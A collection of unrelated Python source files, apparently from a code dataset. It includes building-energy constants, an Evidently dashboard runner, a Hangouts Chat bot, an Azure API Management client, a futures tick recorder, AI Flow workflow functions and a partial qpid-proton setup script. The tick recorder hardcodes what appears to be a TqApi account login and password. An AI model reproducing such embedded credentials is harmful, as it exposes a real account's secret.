This file contains the constants used in the building energy demand calculations
"""
__author__ = "Gabriel Happle"
__copyright__ = "Copyright 2018, Architecture and Building Systems - ETH Zurich"
__credits__ = ["Gabriel Happle"]
__license__ = "MIT"
__version__ = "0.1"
__maintainer__ = "Daren Thomas"
__email__ = "[email protected]"
__status__ = "Production"
# all values are refactored from legacy Globalvars unless stated otherwise
# DEFAULT BUILDING GEOMETRY
H_F = 3.0 # average height per floor in m
D = 20.0 # in mm the diameter of the pipe to calculate losses
# SOLAR
RSE = 0.04 # thermal resistance of external surfaces according to ISO 6946
# HVAC SYSTEMS & VENTILATION
ETA_REC = 0.75 # constant efficiency of Heat recovery
DELTA_P_DIM = 5.0 # (Pa) dimensioning differential pressure for multi-storey building shielded from wind,
# according to DIN 1946-6
P_FAN = 0.55 # specific fan consumption in W/m3/h
MIN_VENTILATION_RATE = 0.6 # l/s/m2 [https://escholarship.org/content/qt7k1796zv/qt7k1796zv.pdf]
TEMPERATURE_ZONE_CONTROL_NIGHT_FLUSHING = 26 # (°C) night flushing only if temperature is higher than 26 # TODO review and make dynamic
DELTA_T_NIGHT_FLUSHING = 2 # (°C) night flushing only if outdoor temperature is two degrees lower than indoor according to SIA 382/1
SHIELDING_CLASS = 2 # according to ISO 16798-7, 0 = open terrain, 1 = partly shielded from wind,
# 2 = fully shielded from wind
TER_CLASS = 2 # terrain class of surroundings according to ISO 16798-7: 0 = open, 1 = rural, 2 = urban
RHO_AIR_REF = 1.23 # (kg/m3) constant from Table 12 in DIN 16798-7
TEMP_EXT_REF = 283 # (K) constant from Table 12 in DIN 16798-7
COEFF_TURB = 0.01 # (m/s) constant from Table 12 in DIN 16798-7
COEFF_WIND = 0.001 # (1/(m/s)) constant from Table 12 in DIN 16798-7
COEFF_STACK = 0.0035 # ((m/s)/(mK)) constant from Table 12 in DIN 16798-7
COEFF_D_WINDOW = 0.67 # (-), B.1.2.1 from annex B in DIN 16798-7 [1]
COEFF_D_VENT = 0.6 # flow coefficient for ventilation openings, B.1.2.1 in [1]
DELTA_C_P = 0.75 # (-), option 2 in B.1.3.4 from annex B in DIN 16798-7 [1]
DELTA_P_LEA_REF = 50 # air tightness index of the building envelope at reference pressure (Pa), B.1.3.14 in DIN 16798-7
DELTA_P_VENT_REF = 50 # air tightness index of the building envelope at reference pressure (Pa)
# FIXME no default value specified in standard
N_LEA = 0.667 # volumetric flow rate exponential due for leakage calculation, B.1.3.15 in DIN 16798-7
N_VENT = 0.5 # volumetric flow rate exponential due for ventilation calculation, B.1.2.2 in DIN 16798-7
# pumps ?
# TODO: Document
DELTA_P_1 = 0.1 # delta of pressure
F_SR = 0.3 # factor for pressure calculation
HOURS_OP = 5 # assuming around 2000 hours of operation per year. It is charged to the electrical system from 11 am to 4 pm
EFFI = 0.6 # efficiency of pumps
# WATER
FLOWTAP = 0.036 # in m3 == 12 l/min during 3 min every tap opening
TWW_SETPOINT = 60 # dhw tank set point temperature in C
# PHYSICAL
H_WE = 2466e3 # (J/kg) Latent heat of vaporization of water [section 6.3.6 in ISO 52016-1:2007]
C_A = 1006 # (J/(kg*K)) Specific heat of air at constant pressure [section 6.3.6 in ISO 52016-1:2007]
GR = 9.81 # m/s2 gravity
# RC-MODEL
B_F = 0.7 # it calculates the coefficient of reduction in transmittance for surfaces in contact with the ground according to values of SIA 380/1
H_IS = 3.45 # heat transfer coefficient between air and the surfacein W/(m2K)
H_MS = 9.1 # heat transfer coefficient between nodes m and s in W/m2K
LAMBDA_AT = 4.5 # dimensionless ratio between the internal surfaces area and the floor area from ISO 13790 Eq. 9
# RC-MODEL TEMPERATURE BOUNDS
T_WARNING_LOW = -30.0
T_WARNING_HIGH = 50.0
# SUPPLY AND RETURN TEMPERATURES OF REFRIGERATION SYSTEM
T_C_REF_SUP_0 = 1 # (°C) refactored from refrigeration loads, without original source
T_C_REF_RE_0 = 5 # (°C) refactored from refrigeration loads, without original source
# SUPPLY AND RETURN TEMPERATURES OF DATA CENTER COOLING SYSTEM
T_C_DATA_RE_0 = 15 # (°C) refactored from data center loads, without original source
T_C_DATA_SUP_0 = 7 # (°C) refactored from data center loads, without original source
VARIABLE_CEA_SCHEDULE_RELATION = {'Occ_m2pax': 'OCCUPANCY',
'Qs_Wpax': 'OCCUPANCY',
'X_ghpax': 'OCCUPANCY',
'Ve_lpspax': 'OCCUPANCY',
'Ea_Wm2': 'APPLIANCES',
'El_Wm2': 'LIGHTING',
'Ed_Wm2': 'SERVERS',
'Vww_lpdpax': 'WATER',
'Vw_lpdpax': 'WATER',
'Ths_set_C': 'HEATING',
'Tcs_set_C': 'COOLING',
'Qcre_Wm2': 'PROCESSES',
'Qhpro_Wm2': 'PROCESSES',
'Qcpro_Wm2': 'PROCESSES',
'Epro_Wm2': 'PROCESSES',
}
TEMPERATURE_VARIABLES = ['HEATING', 'COOLING']
PEOPLE_DEPENDENT_VARIABLES = ['OCCUPANCY', 'WATER']
AREA_DEPENDENT_VARIABLES = ['APPLIANCES', 'LIGHTING', 'PROCESSES', 'SERVERS']
|
the-stack_0_25960
|
from dataclasses import dataclass
from typing import List
from evidently.dashboard import Dashboard
from evidently.runner.runner import RunnerOptions, Runner
from evidently.tabs import DataDriftTab, CatTargetDriftTab, ClassificationPerformanceTab, \
NumTargetDriftTab, ProbClassificationPerformanceTab, RegressionPerformanceTab
@dataclass
class DashboardRunnerOptions(RunnerOptions):
dashboard_tabs: List[str]
tabs_mapping = dict(
data_drift=DataDriftTab,
cat_target_drift=CatTargetDriftTab,
classification_performance=ClassificationPerformanceTab,
prob_classification_performance=ProbClassificationPerformanceTab,
num_target_drift=NumTargetDriftTab,
regression_performance=RegressionPerformanceTab,
)
class DashboardRunner(Runner):
def __init__(self, options: DashboardRunnerOptions):
super().__init__(options)
self.options = options
def run(self):
(reference_data, production_data) = self._parse_data()
tabs = []
for tab in self.options.dashboard_tabs:
tab_class = tabs_mapping.get(tab, None)
if tab_class is None:
raise ValueError(f"Unknown tab {tab}")
tabs.append(tab_class)
dashboard = Dashboard(tabs=tabs)
dashboard.calculate(reference_data, production_data, self.options.column_mapping)
dashboard.save(self.options.output_path + ".html")
|
the-stack_0_25961
|
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# pylint: disable=invalid-name
"""
Simple Hangouts Chat bot that responds to events and
messages from a room.
"""
# [START basic-bot]
import logging
from flask import Flask, render_template, request, json
app = Flask(__name__)
@app.route('/', methods=['POST'])
def home_post():
"""Respond to POST requests to this endpoint.
All requests sent to this endpoint from Hangouts Chat are POST
requests.
"""
data = request.get_json()
resp = None
if data['type'] == 'REMOVED_FROM_SPACE':
logging.info('Bot removed from a space')
else:
resp_dict = format_response(data)
resp = json.jsonify(resp_dict)
return resp
def format_response(event):
"""Determine what response to provide based upon event data.
Args:
event: A dictionary with the event data.
"""
text = ""
# Case 1: The bot was added to a room
if event['type'] == 'ADDED_TO_SPACE' and event['space']['type'] == 'ROOM':
text = 'Thanks for adding me to "%s"!' % event['space']['displayName']
# Case 2: The bot was added to a DM
elif event['type'] == 'ADDED_TO_SPACE' and event['space']['type'] == 'DM':
text = 'Thanks for adding me to a DM, %s!' % event['user']['displayName']
elif event['type'] == 'MESSAGE':
text = 'Your message: "%s"' % event['message']['text']
return {'text': text}
# [END basic-bot]
@app.route('/', methods=['GET'])
def home_get():
"""Respond to GET requests to this endpoint.
This function responds to requests with a simple HTML landing page for this
App Engine instance.
"""
return render_template('home.html')
if __name__ == '__main__':
# This is used when running locally. Gunicorn is used to run the
# application on Google App Engine. See entrypoint in app.yaml.
app.run(host='127.0.0.1', port=8080, debug=True)
|
the-stack_0_25962
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class ApiExportOperations:
"""ApiExportOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.apimanagement.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def get(
self,
resource_group_name: str,
service_name: str,
api_id: str,
format: Union[str, "_models.ExportFormat"],
export: Union[str, "_models.ExportApi"],
**kwargs
) -> "_models.ApiExportResult":
"""Gets the details of the API specified by its identifier in the format specified to the Storage
Blob with SAS Key valid for 5 minutes.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param service_name: The name of the API Management service.
:type service_name: str
:param api_id: API revision identifier. Must be unique in the current API Management service
instance. Non-current revision has ;rev=n as a suffix where n is the revision number.
:type api_id: str
:param format: Format in which to export the Api Details to the Storage Blob with Sas Key valid
for 5 minutes.
:type format: str or ~azure.mgmt.apimanagement.models.ExportFormat
:param export: Query parameter required to export the API details.
:type export: str or ~azure.mgmt.apimanagement.models.ExportApi
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ApiExportResult, or the result of cls(response)
:rtype: ~azure.mgmt.apimanagement.models.ApiExportResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ApiExportResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-12-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'serviceName': self._serialize.url("service_name", service_name, 'str', max_length=50, min_length=1, pattern=r'^[a-zA-Z](?:[a-zA-Z0-9-]*[a-zA-Z0-9])?$'),
'apiId': self._serialize.url("api_id", api_id, 'str', max_length=256, min_length=1, pattern=r'^[^*#&+:<>?]+$'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['format'] = self._serialize.query("format", format, 'str')
query_parameters['export'] = self._serialize.query("export", export, 'str')
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('ApiExportResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ApiManagement/service/{serviceName}/apis/{apiId}'} # type: ignore
|
the-stack_0_25964
|
import tqsdk
import thostmduserapi as mdapi
import redis
import whfunc
import tqsdk
import re
import time
import queue
from tqsdk.tafunc import time_to_str
from tq_md_objs import TQ_md_class,CFtdcMdSpi
import schedule
当前交易日="00000000"
def 启动行情记录2(symbol_list,list_duration_seconds,行情类型="TQ",redis_con=None,天勤连接=None,通达信连接=None,data_length=2000,行情地址="tcp://101.230.209.178:53313",md_subscription_name="gaoctp"):
global 当前交易日
存储tick队列=queue.Queue()
if not redis_con:
redis_con=redis.Redis(db=15)
while True:
天勤连接=tqsdk.TqApi(auth="[email protected],24729220a")
if 行情类型=="TQ":
单symbol_dict=set()
需要订阅的CTPsymbol=[]
订阅中的主连合约={}
订阅中的主连合约_反向={}
订阅中的指数合约={}
天勤需要添加的合约=[]
for x in symbol_list:
if "KQ.m" in x:
订阅中的主连合约[x]=天勤连接.get_quote(x).underlying_symbol
需要订阅的CTPsymbol.append(订阅中的主连合约[x])
天勤需要添加的合约.append(订阅中的主连合约[x])
elif "KQ.i" in x:
symbol=x.split("@")[1]
订阅中的指数合约[x]= [ y for y in 天勤连接._data['quotes'] if 天勤连接._data['quotes'][y]["expired"]==False and re.findall("^"+symbol+"[0-9]{3,4}$",y) ]
需要订阅的CTPsymbol+=订阅中的指数合约[x]
天勤需要添加的合约+=订阅中的指数合约[x]
list_duration_seconds.append(86400)
else:
需要订阅的CTPsymbol.append(x)
单symbol_dict.add(x)
symbol_list= list(set(symbol_list+天勤需要添加的合约))
订阅中的主连合约_反向={ 订阅中的主连合约[x]:x for x in 订阅中的主连合约}
list_duration_seconds=list(set(list_duration_seconds))
天勤=TQ_md_class(symbol_list,list_duration_seconds,天勤连接,redis_con,data_length,md_subscription_name)
#建立一个原版行情API实例
mduserapi=mdapi.CThostFtdcMdApi_CreateFtdcMdApi()
#建立一个自定义的行情类()的连接实例
mduserspi=CFtdcMdSpi(mduserapi,存储tick队列,需要订阅的CTPsymbol)
#为连接实例设置连接地址
mduserapi.RegisterFront(行情地址)
mduserapi.RegisterSpi(mduserspi)
#启动连接线程
mduserapi.Init()
#进行线程阻塞
单symbol_dict映射={ x.split('.')[1]:x for x in 需要订阅的CTPsymbol}
while True:
try:
symbol,UpdateTime, UpdateMillisec, TradingDay,ActionDay,LastPrice, Volume, AskPrice1,AskVolume1, BidPrice1,BidVolume1,OpenInterest,\
PreSettlementPrice,PreClosePrice, PreOpenInterest,OpenPrice,HighestPrice,LowestPrice,Turnover,ClosePrice,SettlementPrice,UpperLimitPrice,LowerLimitPrice,BidPrice2,BidVolume2,AskPrice2,AskVolume2,\
BidPrice3,BidVolume3,AskPrice3,AskVolume3,BidPrice4,BidVolume4,AskPrice4,AskVolume4,BidPrice5,BidVolume5,AskPrice5,AskVolume5,AveragePrice=存储tick队列.get(timeout=30)
except:
当前时间=time_to_str(time.time())[11:16]
if 当前时间>"20:30" or "00:00"<=当前时间<"02:30" or "08:30"<当前时间<"15:30":
continue
else:
time.sleep(1)
mduserapi.Release()
print("哥哥我释放了")
break
# if time_to_str(time.time())[11:13] in ("16","03") or time_to_str(time.time())[11:16]=="10:11" :
# mduserapi.Release()
# print("哥哥我释放了2")
# # for x in range(1000):
# # print(x)
# # time.sleep(1)
# break
if 行情类型=="TQ":
#print(symbol)
#处理本条data
if 当前交易日<TradingDay:
当前交易日=TradingDay
天勤.updata(单symbol_dict映射[symbol],UpdateTime, UpdateMillisec, 当前交易日,ActionDay,LastPrice, Volume, AskPrice1,AskVolume1, BidPrice1,BidVolume1,OpenInterest,PreSettlementPrice,PreClosePrice, PreOpenInterest,OpenPrice,HighestPrice,LowestPrice,Turnover,ClosePrice,SettlementPrice,UpperLimitPrice,LowerLimitPrice,BidPrice2,BidVolume2,AskPrice2,AskVolume2,BidPrice3,BidVolume3,AskPrice3,AskVolume3,BidPrice4,BidVolume4,AskPrice4,AskVolume4,BidPrice5,BidVolume5,AskPrice5,AskVolume5,AveragePrice)
#处理主连
if 单symbol_dict映射[symbol] in 订阅中的主连合约_反向:
天勤.updata(订阅中的主连合约_反向[单symbol_dict映射[symbol]],UpdateTime, UpdateMillisec, TradingDay,ActionDay,LastPrice, Volume, AskPrice1,AskVolume1, BidPrice1,BidVolume1,OpenInterest,PreSettlementPrice,PreClosePrice, PreOpenInterest,OpenPrice,HighestPrice,LowestPrice,Turnover,ClosePrice,SettlementPrice,UpperLimitPrice,LowerLimitPrice,BidPrice2,BidVolume2,AskPrice2,AskVolume2,BidPrice3,BidVolume3,AskPrice3,AskVolume3,BidPrice4,BidVolume4,AskPrice4,AskVolume4,BidPrice5,BidVolume5,AskPrice5,AskVolume5,AveragePrice)
#如果处理data后,为空列表,change_i_data
if 存储tick队列.empty():
time.sleep(0.003)
if 存储tick队列.empty():
#print(time_to_str(time.time()))
天勤.change_i_data(订阅中的指数合约)
#整体处理后,全部推送
天勤.all_push()
print(time_to_str(time.time()),"完成本轮推送")
else:
#print("我错了")
pass
while True:
当前时间=time_to_str(time.time())[11:16]
if 当前时间>"20:30" or "00:00"<=当前时间<"02:30" or "08:30"<当前时间<"15:30":
break
else:
time.sleep(1)
def 启动行情记录(symbol_list,list_duration_seconds,行情类型="TQ",redis_con=None,天勤连接=None,通达信连接=None,data_length=2000,行情地址="tcp://101.230.209.178:53313",md_subscription_name="gaoctp"):
while True:
当前时间=time_to_str(time.time())[11:16]
if 当前时间>"20:30" or "00:00"<当前时间<"02:30" or "08:30"<当前时间<"15:30":
启动行情记录2(symbol_list,list_duration_seconds,行情类型,redis_con,天勤连接,通达信连接,data_length,行情地址,md_subscription_name)
time.sleep(1)
|
the-stack_0_25965
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import time
import sys
import os
from typing import Text, List, Dict
from ai_flow.project.blob_manager import BlobManagerFactory
from ai_flow.util import json_utils
from ai_flow.graph.graph import default_graph
from ai_flow.translator.base_translator import get_default_translator
from ai_flow.client.ai_flow_client import get_ai_flow_client
from ai_flow.api.configuration import project_config, project_description
from ai_flow.workflow.workflow import JobInfo, WorkflowExecutionInfo, WorkflowInfo, Workflow
from ai_flow.rest_endpoint.service.workflow_proto_utils import \
proto_to_workflow, proto_to_workflow_list, proto_to_workflow_execution, proto_to_workflow_execution_list,\
proto_to_job, proto_to_job_list
def _upload_project_package(workflow: Workflow):
"""
Upload the project package.
:param workflow: The generated workflow.
"""
project_desc = project_description()
workflow_json_file = os.path.join(project_desc.get_absolute_temp_path(),
project_desc.project_config.get_project_uuid() + "_workflow.json")
with open(workflow_json_file, 'w') as f:
f.write(json_utils.dumps(workflow))
blob_manager = BlobManagerFactory.get_blob_manager(project_desc.project_config['blob'])
uploaded_project_path = blob_manager.upload_blob(str(workflow.workflow_id), project_desc.project_path)
project_desc.project_config.set_uploaded_project_path(uploaded_project_path)
for job in workflow.jobs.values():
job.job_config.project_path = uploaded_project_path
def _register_job_meta(workflow_id: int, job):
start_time = time.time()
if job.job_config.job_name is None:
name = job.instance_id
else:
name = job.job_config.job_name
job_name = str(workflow_id) + '_' + name[0:20] + '_' + str(start_time)
job.job_name = job_name
def _set_entry_module_path(workflow: Workflow, entry_module_path: Text):
"""
Set entry model path.
:param workflow: The generated workflow.
"""
for job in workflow.jobs.values():
job.job_config.properties['entry_module_path'] = entry_module_path
def submit_workflow(workflow_name: Text = None,
args: Dict = None) -> WorkflowInfo:
"""
Submit the ai flow workflow to the scheduler.
:param workflow_name: The ai flow workflow identify.
:param args: The arguments of the submit action.
:return: The result of the submit action.
"""
call_path = os.path.abspath(sys._getframe(1).f_code.co_filename)
project_path = os.path.abspath(project_description().project_path)
# length /python_codes/ is 14; length .py is 3
entry_module_path = call_path[len(project_path)+14:-3].replace('/', '.')
namespace = project_config().get_project_name()
translator = get_default_translator()
workflow = translator.translate(graph=default_graph(), project_desc=project_description())
for job in workflow.jobs.values():
_register_job_meta(workflow_id=workflow.workflow_id, job=job)
_set_entry_module_path(workflow, entry_module_path)
_upload_project_package(workflow)
return proto_to_workflow(get_ai_flow_client()
.submit_workflow_to_scheduler(namespace=namespace,
workflow_json=json_utils.dumps(workflow),
workflow_name=workflow_name,
args=args))
def delete_workflow(workflow_name: Text = None) -> WorkflowInfo:
"""
Delete the ai flow workflow from the scheduler.
:param workflow_name: The ai flow workflow identify.
:return: The result of the action.
"""
namespace = project_config().get_project_name()
return proto_to_workflow(get_ai_flow_client().delete_workflow(namespace, workflow_name))
def pause_workflow_scheduling(workflow_name: Text = None) -> WorkflowInfo:
"""
Pause the ai flow workflow from the scheduler.
:param workflow_name: The ai flow workflow identify.
:return: The result of the action.
"""
namespace = project_config().get_project_name()
return proto_to_workflow(get_ai_flow_client().pause_workflow_scheduling(namespace, workflow_name))
def resume_workflow_scheduling(workflow_name: Text = None) -> WorkflowInfo:
"""
Resume the ai flow workflow from the scheduler.
:param workflow_name: The ai flow workflow identify.
:return: The result of the action.
"""
namespace = project_config().get_project_name()
return proto_to_workflow(get_ai_flow_client().resume_workflow_scheduling(namespace, workflow_name))
def get_workflow(workflow_name: Text = None) -> WorkflowInfo:
"""
Return the workflow information.
:param workflow_name: The ai flow workflow identify.
:return: the workflow information.
"""
namespace = project_config().get_project_name()
return proto_to_workflow(get_ai_flow_client().get_workflow(namespace, workflow_name))
def list_workflows() -> List[WorkflowInfo]:
"""
:return: All workflow information.
"""
namespace = project_config().get_project_name()
return proto_to_workflow_list(get_ai_flow_client().list_workflows(namespace))
def start_new_workflow_execution(workflow_name: Text) -> WorkflowExecutionInfo:
"""
Run the project under the current project path.
:param workflow_name: The ai flow workflow identify.
:return: The result of the run action.
"""
namespace = project_config().get_project_name()
return proto_to_workflow_execution(get_ai_flow_client().start_new_workflow_execution(namespace, workflow_name))
def kill_all_workflow_executions(workflow_name: Text) -> List[WorkflowExecutionInfo]:
"""
Stop all instances of the workflow.
:param workflow_name: The ai flow workflow identify.
:return: The result of the action.
"""
namespace = project_config().get_project_name()
return proto_to_workflow_execution_list(get_ai_flow_client().kill_all_workflow_executions(namespace, workflow_name))
def kill_workflow_execution(execution_id: Text) -> WorkflowExecutionInfo:
"""
Stop the instance of the workflow.
:param execution_id: The ai flow workflow execution identify.
:return: The result of the action.
"""
return proto_to_workflow_execution(get_ai_flow_client().kill_workflow_execution(execution_id))
def get_workflow_execution(execution_id: Text) -> WorkflowExecutionInfo:
"""
Get the WorkflowExecutionInfo from scheduler.
:param execution_id:
:return: WorkflowExecutionInfo
"""
return proto_to_workflow_execution(get_ai_flow_client().get_workflow_execution(execution_id))
def list_workflow_executions(workflow_name: Text) -> List[WorkflowExecutionInfo]:
"""
:param workflow_name: The ai flow workflow identify.
:return: All workflow executions of the workflow.
"""
namespace = project_config().get_project_name()
return proto_to_workflow_execution_list(get_ai_flow_client().list_workflow_executions(namespace, workflow_name))
def start_job(job_name: Text,
execution_id: Text) -> JobInfo:
"""
Start a job defined in the ai flow workflow.
:param job_name: The job name which task defined in workflow.
:param execution_id: The ai flow workflow execution identify.
:return: The result of the action.
"""
return proto_to_job(get_ai_flow_client().start_job(job_name, execution_id))
def stop_job(job_name: Text,
execution_id: Text) -> JobInfo:
"""
Stop a job defined in the ai flow workflow.
:param job_name: The job name which task defined in workflow.
:param execution_id: The ai flow workflow execution identify.
:return: The result of the action.
"""
return proto_to_job(get_ai_flow_client().stop_job(job_name, execution_id))
def restart_job(job_name: Text,
execution_id: Text) -> JobInfo:
"""
Restart a task defined in the ai flow workflow.
:param job_name: The job name which task defined in workflow.
:param execution_id: The ai flow workflow execution identify.
:return: The result of the action.
"""
return proto_to_job(get_ai_flow_client().restart_job(job_name, execution_id))
def get_job(job_name: Text,
execution_id: Text) -> JobInfo:
"""
Get job information by job name.
:param job_name:
:param execution_id:
:return:
"""
return proto_to_job(get_ai_flow_client().get_job(job_name, execution_id))
def list_jobs(execution_id: Text) -> List[JobInfo]:
"""
List the jobs of the workflow execution.
:param execution_id:
:return:
"""
return proto_to_job_list(get_ai_flow_client().list_jobs(execution_id))
|
the-stack_0_25966
|
#!/usr/bin/env python
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""
python-qpid-proton setup script
DISCLAIMER: This script took lots of inspirations from PyZMQ, which is licensed
under the 'MODIFIED BSD LICENSE'.
Although inspired by the work in PyZMQ, this script and the modules it depends
on were largely simplified to meet the requirements of the library.
The default behavior of this script is to build the registered `_cproton`
extension using the system qpid-proton library. However, before doing that, the
script will try to discover the available qpid-proton's version and whether it's
suitable for the version of this library. This allows us to have a tight release
between the versions of the bindings and qpid-proton's version.
The versions used to verify this are in `setuputils.bundle` and they should be
increased on every release. Note that `bundled_version` matches the current
released version. The motivation behind this is that we don't know how many
new releases will be made in the `0.9` series, therefore we need to target the
latest possible.
If qpid-proton is found in the system and the available versions are match the
required ones, then the install process will continue normally.
If the available versions are not good for the bindings or the library is
missing, then the following will happen:
The setup script will attempt to download the C source for qpid-proton - see
`setuputils.bundle.fetch_libqpid_proton` - and it will include the proton C
code into the extension itself.
While the above removes the need of *always* having qpid-proton installed, it
does not solve the need of having `swig` and the libraries qpid-proton requires
installed to make this setup work.
From the Python side, this scripts overrides 1 command - build_ext - and it adds a
new one. The later - Configure - is called from the former to setup/discover what's
in the system. The rest of the comands and steps are done normally without any kind
of monkey patching.
"""
import glob
import os
import subprocess
import sys
import distutils.spawn as ds_spawn
import distutils.sysconfig as ds_sys
from distutils.ccompiler import new_compiler, get_default_compiler
from distutils.core import setup, Extension
from distutils.command.build import build
from distutils.command.build_ext import build_ext
from distutils.command.sdist import sdist
from distutils import errors
from setuputils import bundle
from setuputils import log
from setuputils import misc
class CheckSDist(sdist):
def run(self):
self.distribution.run_command('configure')
# Append the source that was removed during
# the configuration step.
_cproton = self.distribution.ext_modules[-1]
_cproton.sources.append('cproton.i')
try:
sdist.run(self)
finally:
for src in ['cproton.py', 'cproton_wrap.c']:
if os.path.exists(src):
os.remove(src)
class Configure(build_ext):
description = "Discover Qpid Proton version"
@property
def compiler_type(self):
compiler = self.compiler
if compiler is None:
return get_default_compiler()
elif isinstance(compiler, str):
return compiler
else:
return compiler.compiler_type
def prepare_swig_wrap(self):
"""Run swig against the sources. This will cause swig to compile the
cproton.i file into a .c file called cproton_wrap.c, and create
cproton.py.
"""
ext = self.distribution.ext_modules[-1]
if 'SWIG' in os.environ:
self.swig = os.environ['SWIG']
try:
# This will actually call swig to generate the files
# and list the sources.
self.swig_sources(ext.sources, ext)
except (errors.DistutilsExecError, errors.DistutilsPlatformError) as e:
if not (os.path.exists('cproton_wrap.c') or
os.path.exists('cproton.py')):
raise e
# now remove the cproton.i file from the source list so we don't run
# swig again.
ext.sources = ext.sources[1:]
ext.swig_opts = []
def bundle_libqpid_proton_extension(self):
"""The proper version of libqpid-proton is not present on the system,
so attempt to retrieve the proper libqpid-proton sources and
include them in the extension.
"""
setup_path = os.path.dirname(os.path.realpath(__file__))
base = self.get_finalized_command('build').build_base
build_include = os.path.join(base, 'include')
log.info("Bundling qpid-proton into the extension")
# QPID_PROTON_SRC - (optional) pathname to the Proton C sources. Can
# be used to override where this setup gets the Proton C sources from
# (see bundle.fetch_libqpid_proton())
if 'QPID_PROTON_SRC' not in os.environ:
if not os.path.exists(os.path.join(setup_path, 'CMakeLists.txt')):
bundledir = os.path.join(base, "bundled")
if not os.path.exists(bundledir):
os.makedirs(bundledir)
bundle.fetch_libqpid_proton(bundledir)
libqpid_proton_dir = os.path.abspath(os.path.join(bundledir, 'qpid-proton'))
else:
# setup.py is being invoked from within the proton source tree
# (CMakeLists.txt is not present in the python source dist).
# In this case build using the local sources. This use case is
# specifically for developers working on the proton source
# code.
proton_c = os.path.join(setup_path, '..', '..', '..')
libqpid_proton_dir = os.path.abspath(proton_c)
else:
libqpid_proton_dir = os.path.abspath(os.environ['QPID_PROTON_SRC'])
log.debug("Using libqpid-proton src: %s" % libqpid_proton_dir)
proton_base = os.path.join(libqpid_proton_dir, 'proton-c')
proton_src = os.path.join(proton_base, 'src')
proton_include = os.path.join(proton_base, 'include')
#
# Create any generated header files, and put them in build_include:
#
if not os.path.exists(build_include):
os.makedirs(build_include)
os.mkdir(os.path.join(build_include, 'proton'))
# Create copy of environment variables and modify PYTHONPATH to preserve
# all others environment variables defined by user. When `env` is specified
# Popen will not inherit environment variables of the current process.
proton_envs = os.environ.copy()
default_path = proton_envs.get('PYTHONPATH')
proton_envs['PYTHONPATH'] = proton_base if not default_path else '{0}{1}{2}'.format(
proton_base, os.pathsep, default_path)
# Generate `protocol.h` by calling the python
# script found in the source dir.
with open(os.path.join(build_include, 'protocol.h'), 'wb') as header:
subprocess.Popen([sys.executable, os.path.join(proton_src, 'protocol.h.py')],
env=proton_envs, stdout=header)
# Generate `encodings.h` by calling the python
# script found in the source dir.
with open(os.path.join(build_include, 'encodings.h'), 'wb') as header:
